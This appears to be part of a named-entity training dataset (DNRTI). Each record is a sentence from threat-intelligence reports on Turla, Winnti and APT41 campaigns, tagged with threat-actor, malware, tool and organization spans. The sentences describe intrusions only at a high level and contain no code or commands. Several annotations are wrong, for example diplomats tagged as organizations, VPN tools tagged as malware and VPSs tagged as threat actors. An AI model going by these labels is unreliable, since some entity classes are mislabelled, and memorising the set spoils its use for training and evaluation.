{"text": "The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository .", "spans": {"MALWARE: MSIL dropper": [[71, 83]], "ORGANIZATION: Proofpoint": [[110, 120]]}, "info": {"id": "dnrti_train_002976", "source": "dnrti_train"}}
{"text": "Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ways it may have been delivered including some of Turla’s previous attack methods such as spear phishing or via a watering hole .", "spans": {"THREAT_ACTOR: Turla’s": [[139, 146]]}, "info": {"id": "dnrti_train_002977", "source": "dnrti_train"}}
{"text": "This could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"ORGANIZATION: diplomats": [[19, 28]], "ORGANIZATION: journalists": [[125, 136]]}, "info": {"id": "dnrti_train_002978", "source": "dnrti_train"}}
{"text": "Turla's goal could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"THREAT_ACTOR: Turla's": [[0, 7]]}, "info": {"id": "dnrti_train_002979", "source": "dnrti_train"}}
{"text": "The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper .", "spans": {"MALWARE: KopiLuwak": [[70, 79]], "MALWARE: MSIL dropper": [[147, 159]]}, "info": {"id": "dnrti_train_002980", "source": "dnrti_train"}}
{"text": "The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper .", "spans": {"MALWARE: MSIL dropper": [[48, 60]], "MALWARE: Javascript (JS) dropper": [[115, 138]]}, "info": {"id": "dnrti_train_002981", "source": "dnrti_train"}}
{"text": "As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only .", "spans": {"MALWARE: JS dropper": [[43, 53]], "MALWARE: JS decryptor": [[76, 88]], "MALWARE: KopiLuwak": [[168, 177]]}, "info": {"id": "dnrti_train_002982", "source": "dnrti_train"}}
{"text": "As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload .", "spans": {"ORGANIZATION: Proofpoint": [[3, 13]], "MALWARE: MSIL payload": [[145, 157]]}, "info": {"id": "dnrti_train_002983", "source": "dnrti_train"}}
{"text": "Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla’s more fully featured implants .", "spans": {"ORGANIZATION: Kaspersky": [[53, 62]], "THREAT_ACTOR: Turla’s": [[194, 201]]}, "info": {"id": "dnrti_train_002985", "source": "dnrti_train"}}
{"text": "Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_002986", "source": "dnrti_train"}}
{"text": "We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves .", "spans": {"MALWARE: .NET malware": [[51, 63]], "MALWARE: Topinambour": [[84, 95]]}, "info": {"id": "dnrti_train_002987", "source": "dnrti_train"}}
{"text": "The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan .", "spans": {"MALWARE: .NET module": [[16, 27]], "MALWARE: KopiLuwak JavaScript": [[52, 72]]}, "info": {"id": "dnrti_train_002988", "source": "dnrti_train"}}
{"text": "Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak .", "spans": {"THREAT_ACTOR: Turla": [[11, 16]]}, "info": {"id": "dnrti_train_002989", "source": "dnrti_train"}}
{"text": "RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and MiamiBeach” serve as the first beacon messages from the victim to the control server .", "spans": {"MALWARE: RocketMan!”": [[0, 11]], "MALWARE: MiamiBeach”": [[82, 93]]}, "info": {"id": "dnrti_train_002990", "source": "dnrti_train"}}
{"text": "These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” .", "spans": {"MALWARE: Softether VPN 4.12”": [[65, 84]], "MALWARE: psiphon3”": [[89, 98]], "MALWARE: Microsoft Office activators”": [[104, 132]]}, "info": {"id": "dnrti_train_002991", "source": "dnrti_train"}}
{"text": "These campaign-related VPSs are located in South Africa .", "spans": {"THREAT_ACTOR: VPSs": [[23, 27]]}, "info": {"id": "dnrti_train_002992", "source": "dnrti_train"}}
{"text": "The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"MALWARE: Trojan": [[4, 10]], "MALWARE: .NET RocketMan Trojan": [[35, 56]]}, "info": {"id": "dnrti_train_002995", "source": "dnrti_train"}}
{"text": "The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence .", "spans": {"TOOL: KopiLuwak": [[13, 22]], "THREAT_ACTOR: Turla": [[84, 89]]}, "info": {"id": "dnrti_train_002996", "source": "dnrti_train"}}
{"text": "Winnti's mode of operation: to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously .", "spans": {"THREAT_ACTOR: Winnti's": [[0, 8]]}, "info": {"id": "dnrti_train_002997", "source": "dnrti_train"}}
{"text": "Hackers usually take precautions , which experts refer to as Opsec .", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]]}, "info": {"id": "dnrti_train_002998", "source": "dnrti_train"}}
{"text": "The Winnti group’s Opsec was dismal to say the least .", "spans": {"THREAT_ACTOR: Winnti": [[4, 10]]}, "info": {"id": "dnrti_train_002999", "source": "dnrti_train"}}
{"text": "This mode of operation is typical of many hacker groups—and especially of Winnti .", "spans": {"THREAT_ACTOR: hacker": [[42, 48]], "THREAT_ACTOR: Winnti": [[74, 80]]}, "info": {"id": "dnrti_train_003000", "source": "dnrti_train"}}
{"text": "They are a very , very persistent group , ” says Costin Raiu , who has been watching Winnti since 2011 .", "spans": {"ORGANIZATION: Costin Raiu": [[49, 60]], "THREAT_ACTOR: Winnti": [[85, 91]]}, "info": {"id": "dnrti_train_003001", "source": "dnrti_train"}}
{"text": "Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers .", "spans": {"ORGANIZATION: Raiu": [[0, 4]], "THREAT_ACTOR: Winnti": [[78, 84]]}, "info": {"id": "dnrti_train_003002", "source": "dnrti_train"}}
{"text": "One government official puts it very matter-of-factly: Winnti is very specific to Germany .", "spans": {"THREAT_ACTOR: Winnti": [[55, 61]]}, "info": {"id": "dnrti_train_003003", "source": "dnrti_train"}}
{"text": "By 2014 , the Winnti malware code was no longer limited to game manufacturers .", "spans": {"THREAT_ACTOR: Winnti": [[14, 20]]}, "info": {"id": "dnrti_train_003004", "source": "dnrti_train"}}
{"text": "Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies .", "spans": {"THREAT_ACTOR: Winnti": [[0, 6]], "ORGANIZATION: high-tech companies": [[20, 39]], "ORGANIZATION: pharmaceutical companies": [[64, 88]]}, "info": {"id": "dnrti_train_003005", "source": "dnrti_train"}}
{"text": "Winnti is attacking companies in Japan , France , the U.S. and Germany .", "spans": {"THREAT_ACTOR: Winnti": [[0, 6]]}, "info": {"id": "dnrti_train_003006", "source": "dnrti_train"}}
{"text": "The Winnti hackers broke into Henkel’s network in 2014 .", "spans": {"THREAT_ACTOR: Winnti": [[4, 10]], "ORGANIZATION: Henkel’s": [[30, 38]]}, "info": {"id": "dnrti_train_003007", "source": "dnrti_train"}}
{"text": "Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions .", "spans": {"ORGANIZATION: Henkel": [[0, 6]], "THREAT_ACTOR: Winnti": [[20, 26]]}, "info": {"id": "dnrti_train_003008", "source": "dnrti_train"}}
{"text": "Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach .", "spans": {"ORGANIZATION: Henkel": [[19, 25]], "THREAT_ACTOR: Winnti": [[64, 70]]}, "info": {"id": "dnrti_train_003009", "source": "dnrti_train"}}
{"text": "The hackers behind Winnti have also set their sights on Japan’s biggest chemical company , Shin-Etsu Chemical .", "spans": {"THREAT_ACTOR: hackers": [[4, 11]], "ORGANIZATION: Shin-Etsu Chemical": [[91, 109]]}, "info": {"id": "dnrti_train_003010", "source": "dnrti_train"}}
{"text": "In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 .", "spans": {"ORGANIZATION: Sumitomo Electric": [[42, 59]], "THREAT_ACTOR: Winnti": [[62, 68]]}, "info": {"id": "dnrti_train_003011", "source": "dnrti_train"}}
{"text": "Winnti hackers also penetrated the BASF and Siemens networks .", "spans": {"THREAT_ACTOR: Winnti": [[0, 6]], "ORGANIZATION: BASF": [[35, 39]], "ORGANIZATION: Siemens": [[44, 51]], "ORGANIZATION: networks": [[52, 60]]}, "info": {"id": "dnrti_train_003012", "source": "dnrti_train"}}
{"text": "Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti .", "spans": {"ORGANIZATION: Bayer pharmaceutical": [[63, 83]], "THREAT_ACTOR: Winnti": [[109, 115]]}, "info": {"id": "dnrti_train_003013", "source": "dnrti_train"}}
{"text": "At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters .", "spans": {"THREAT_ACTOR: Winnti": [[19, 25]]}, "info": {"id": "dnrti_train_003014", "source": "dnrti_train"}}
{"text": "To witnesses , the spy appears to be running a program showing videos (e.g VLC) , presenting slides (Prezi) , playing a computer game (Breakout2 , 2048) or even running a fake virus scanner .", "spans": {"THREAT_ACTOR: spy": [[19, 22]], "TOOL: presenting slides": [[82, 99]], "TOOL: fake virus scanner": [[171, 189]]}, "info": {"id": "dnrti_train_003015", "source": "dnrti_train"}}
{"text": "From the time of file creation , the attacker started working at least as early as July 2018 .", "spans": {"THREAT_ACTOR: attacker": [[37, 45]]}, "info": {"id": "dnrti_train_003016", "source": "dnrti_train"}}
{"text": "The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky’s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features .", "spans": {"ORGANIZATION: Kaspersky’s": [[90, 101]], "THREAT_ACTOR: APT-C-09": [[160, 168]]}, "info": {"id": "dnrti_train_003017", "source": "dnrti_train"}}
{"text": "For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir .", "spans": {"THREAT_ACTOR: Donot": [[14, 19]], "THREAT_ACTOR: Bitter": [[24, 30]]}, "info": {"id": "dnrti_train_003018", "source": "dnrti_train"}}
{"text": "Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities .", "spans": {"THREAT_ACTOR: APT-C-09": [[12, 20]], "THREAT_ACTOR: Bitter": [[23, 29]], "THREAT_ACTOR: Donot": [[34, 39]]}, "info": {"id": "dnrti_train_003019", "source": "dnrti_train"}}
{"text": "APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003020", "source": "dnrti_train"}}
{"text": "FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT41": [[63, 68]]}, "info": {"id": "dnrti_train_003021", "source": "dnrti_train"}}
{"text": "APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003023", "source": "dnrti_train"}}
{"text": "Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests .", "spans": {"THREAT_ACTOR: APT41's": [[61, 68]]}, "info": {"id": "dnrti_train_003024", "source": "dnrti_train"}}
{"text": "APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "ORGANIZATION: FireEye": [[71, 78]]}, "info": {"id": "dnrti_train_003025", "source": "dnrti_train"}}
{"text": "Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity .", "spans": {"THREAT_ACTOR: APT41": [[56, 61]]}, "info": {"id": "dnrti_train_003026", "source": "dnrti_train"}}
{"text": "APT41 has targeted organizations in 14 countries (and Hong Kong) over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003028", "source": "dnrti_train"}}
{"text": "APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003029", "source": "dnrti_train"}}
{"text": "In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]]}, "info": {"id": "dnrti_train_003031", "source": "dnrti_train"}}
{"text": "Since 2017 , APT41's activities have included a series of supply chain compromises .", "spans": {"THREAT_ACTOR: APT41's": [[13, 20]]}, "info": {"id": "dnrti_train_003032", "source": "dnrti_train"}}
{"text": "The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_003033", "source": "dnrti_train"}}
{"text": "Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market .", "spans": {"THREAT_ACTOR: APT41": [[13, 18]]}, "info": {"id": "dnrti_train_003034", "source": "dnrti_train"}}
{"text": "In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China .", "spans": {"THREAT_ACTOR: APT41": [[23, 28]]}, "info": {"id": "dnrti_train_003035", "source": "dnrti_train"}}
{"text": "In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year .", "spans": {"THREAT_ACTOR: APT41": [[17, 22]]}, "info": {"id": "dnrti_train_003036", "source": "dnrti_train"}}
{"text": "Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region .", "spans": {"THREAT_ACTOR: APT41": [[13, 18]]}, "info": {"id": "dnrti_train_003037", "source": "dnrti_train"}}
{"text": "Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity .", "spans": {"ORGANIZATION: telecom companies": [[9, 26]], "THREAT_ACTOR: APT41": [[159, 164]]}, "info": {"id": "dnrti_train_003038", "source": "dnrti_train"}}
{"text": "In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content .", "spans": {"THREAT_ACTOR: APT41": [[26, 31]]}, "info": {"id": "dnrti_train_003039", "source": "dnrti_train"}}
{"text": "This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong .", "spans": {"THREAT_ACTOR: APT41": [[48, 53]]}, "info": {"id": "dnrti_train_003040", "source": "dnrti_train"}}
{"text": "APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not always correlate with targeted users or organizations .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003041", "source": "dnrti_train"}}
{"text": "In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled 中東呼吸器症候 群(MERS)の予防 , ” which translates to Prevention of Middle East Respiratory Syndrome (MERS) .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]]}, "info": {"id": "dnrti_train_003042", "source": "dnrti_train"}}
{"text": "APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003043", "source": "dnrti_train"}}
{"text": "Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests .", "spans": {"THREAT_ACTOR: APT41": [[52, 57]]}, "info": {"id": "dnrti_train_003044", "source": "dnrti_train"}}
{"text": "Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices .", "spans": {"THREAT_ACTOR: APT41": [[9, 14]]}, "info": {"id": "dnrti_train_003045", "source": "dnrti_train"}}
{"text": "In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]]}, "info": {"id": "dnrti_train_003046", "source": "dnrti_train"}}
{"text": "This provides another connection between the targeting of the cryptocurrency organizations and video game targeting .", "spans": {}, "info": {"id": "dnrti_train_003048", "source": "dnrti_train"}}
{"text": "In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "TOOL: XMRig": [[52, 57]]}, "info": {"id": "dnrti_train_003049", "source": "dnrti_train"}}
{"text": "APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003050", "source": "dnrti_train"}}
{"text": "APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003051", "source": "dnrti_train"}}
{"text": "We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics .", "spans": {"TOOL: game source code": [[118, 134]], "TOOL: digital certificates": [[152, 172]]}, "info": {"id": "dnrti_train_003052", "source": "dnrti_train"}}
{"text": "In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO .", "spans": {"THREAT_ACTOR: APT41": [[18, 23]]}, "info": {"id": "dnrti_train_003053", "source": "dnrti_train"}}
{"text": "Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "ORGANIZATION: administrators": [[202, 216]]}, "info": {"id": "dnrti_train_003054", "source": "dnrti_train"}}
{"text": "APT41 has been observed inserting malicious code into legitimate video game files to distribute malware .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003055", "source": "dnrti_train"}}
{"text": "In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise .", "spans": {"THREAT_ACTOR: group": [[14, 19]]}, "info": {"id": "dnrti_train_003056", "source": "dnrti_train"}}
{"text": "We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "TOOL: ROCKBOOT": [[119, 127]]}, "info": {"id": "dnrti_train_003057", "source": "dnrti_train"}}
{"text": "Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets .", "spans": {"ORGANIZATION: ROCKBOOT": [[24, 32]], "THREAT_ACTOR: APT41": [[47, 52]]}, "info": {"id": "dnrti_train_003058", "source": "dnrti_train"}}
{"text": "APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003059", "source": "dnrti_train"}}
{"text": "In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware .", "spans": {"THREAT_ACTOR: APT41": [[27, 32]]}, "info": {"id": "dnrti_train_003060", "source": "dnrti_train"}}
{"text": "APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003061", "source": "dnrti_train"}}
{"text": "APT41 has also used credentials compromised in previous operations .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003063", "source": "dnrti_train"}}
{"text": "In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]], "ORGANIZATION: service provider": [[101, 117]], "ORGANIZATION: payment": [[135, 142]], "ORGANIZATION: service": [[143, 150]]}, "info": {"id": "dnrti_train_003064", "source": "dnrti_train"}}
{"text": "Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations .", "spans": {"TOOL: TeamViewer": [[69, 79]], "THREAT_ACTOR: APT41": [[99, 104]]}, "info": {"id": "dnrti_train_003065", "source": "dnrti_train"}}
{"text": "Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 .", "spans": {"THREAT_ACTOR: APT41": [[53, 58], [196, 201]]}, "info": {"id": "dnrti_train_003066", "source": "dnrti_train"}}
{"text": "As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files .", "spans": {"THREAT_ACTOR: APT41": [[66, 71]], "TOOL: variety of TTPs": [[84, 99]]}, "info": {"id": "dnrti_train_003067", "source": "dnrti_train"}}
{"text": "In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer .", "spans": {"THREAT_ACTOR: Chinese espionage operators": [[26, 53]]}, "info": {"id": "dnrti_train_003068", "source": "dnrti_train"}}
{"text": "In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]], "ORGANIZATION: Kaspersky": [[198, 207]]}, "info": {"id": "dnrti_train_003069", "source": "dnrti_train"}}
{"text": "Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise .", "spans": {"THREAT_ACTOR: APT41": [[5, 10]], "TOOL: TeamViewer": [[56, 66]]}, "info": {"id": "dnrti_train_003070", "source": "dnrti_train"}}
{"text": "Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers .", "spans": {"THREAT_ACTOR: APT41's": [[57, 64]]}, "info": {"id": "dnrti_train_003071", "source": "dnrti_train"}}
{"text": "Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor .", "spans": {"THREAT_ACTOR: APT41": [[25, 30]]}, "info": {"id": "dnrti_train_003072", "source": "dnrti_train"}}
{"text": "The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting .", "spans": {"THREAT_ACTOR: APT41's": [[180, 187]]}, "info": {"id": "dnrti_train_003073", "source": "dnrti_train"}}
{"text": "FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT41": [[81, 86]]}, "info": {"id": "dnrti_train_003074", "source": "dnrti_train"}}
{"text": "In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio .", "spans": {"THREAT_ACTOR: APT41": [[14, 19]]}, "info": {"id": "dnrti_train_003075", "source": "dnrti_train"}}
{"text": "Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time .", "spans": {"THREAT_ACTOR: APT41": [[7, 12], [176, 181]]}, "info": {"id": "dnrti_train_003077", "source": "dnrti_train"}}
{"text": "APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: digital certificates": [[50, 70]]}, "info": {"id": "dnrti_train_003078", "source": "dnrti_train"}}
{"text": "APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: HIGHNOON": [[126, 134]], "TOOL: HOMEUNIX": [[137, 145]], "TOOL: PHOTO": [[148, 153]], "TOOL: SOGU": [[156, 160]], "TOOL: ZXSHELL": [[167, 174]]}, "info": {"id": "dnrti_train_003080", "source": "dnrti_train"}}
{"text": "HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers .", "spans": {"TOOL: HIGHNOON": [[0, 8]], "THREAT_ACTOR: APT41": [[64, 69]], "THREAT_ACTOR: APT17": [[89, 94]]}, "info": {"id": "dnrti_train_003081", "source": "dnrti_train"}}
{"text": "HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 .", "spans": {"TOOL: HOMEUNIX": [[0, 8]], "TOOL: backdoor": [[27, 35]], "THREAT_ACTOR: APT41": [[44, 49]], "THREAT_ACTOR: groups": [[108, 114]], "THREAT_ACTOR: APT1": [[127, 131]], "THREAT_ACTOR: APT10": [[134, 139]], "THREAT_ACTOR: APT17": [[142, 147]], "THREAT_ACTOR: APT18": [[150, 155]], "THREAT_ACTOR: APT20": [[162, 167]]}, "info": {"id": "dnrti_train_003082", "source": "dnrti_train"}}
{"text": "APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: CROSSWALK.BIN": [[15, 28]]}, "info": {"id": "dnrti_train_003083", "source": "dnrti_train"}}
{"text": "Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 .", "spans": {"THREAT_ACTOR: espionage group": [[16, 31]], "TOOL: CLASSFON": [[54, 62]]}, "info": {"id": "dnrti_train_003084", "source": "dnrti_train"}}
{"text": "At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group .", "spans": {"TOOL: HIGHNOON.CLI": [[41, 53]], "TOOL: GEARSHIFT": [[58, 67]], "THREAT_ACTOR: APT17": [[88, 93]], "THREAT_ACTOR: group": [[134, 139]]}, "info": {"id": "dnrti_train_003085", "source": "dnrti_train"}}
{"text": "APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: code-signing certificates": [[26, 51]]}, "info": {"id": "dnrti_train_003086", "source": "dnrti_train"}}
{"text": "In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]]}, "info": {"id": "dnrti_train_003087", "source": "dnrti_train"}}
{"text": "In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company .", "spans": {"THREAT_ACTOR: APT41": [[14, 19]], "TOOL: TeamViewer": [[25, 35]]}, "info": {"id": "dnrti_train_003089", "source": "dnrti_train"}}
{"text": "Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]], "VULNERABILITY: exploit": [[52, 59]], "VULNERABILITY: CVE-2019-3396": [[69, 82]]}, "info": {"id": "dnrti_train_003090", "source": "dnrti_train"}}
{"text": "We observed APT41 using a compromised account to create a scheduled task on a system , write a binary component of HIGHNOON containing the payload and C&C information to disk , and then modify the legitimate Windows WMI Performance Adaptor (wmiApSrv) to execute the HIGHNOON payload .", "spans": {"THREAT_ACTOR: APT41": [[12, 17]]}, "info": {"id": "dnrti_train_003092", "source": "dnrti_train"}}
{"text": "The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: HIGHNOON": [[136, 144]], "TOOL: SOGU": [[149, 153]]}, "info": {"id": "dnrti_train_003093", "source": "dnrti_train"}}
{"text": "APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003094", "source": "dnrti_train"}}
{"text": "To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files .", "spans": {"THREAT_ACTOR: APT41": [[23, 28]], "TOOL: Sticky Keys": [[53, 64]], "TOOL: scheduled tasks": [[81, 96]], "TOOL: bootkits": [[99, 107]], "TOOL: rootkits": [[110, 118]], "TOOL: registry modifications": [[121, 143]]}, "info": {"id": "dnrti_train_003095", "source": "dnrti_train"}}
{"text": "APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: ROCKBOOT": [[16, 24]]}, "info": {"id": "dnrti_train_003096", "source": "dnrti_train"}}
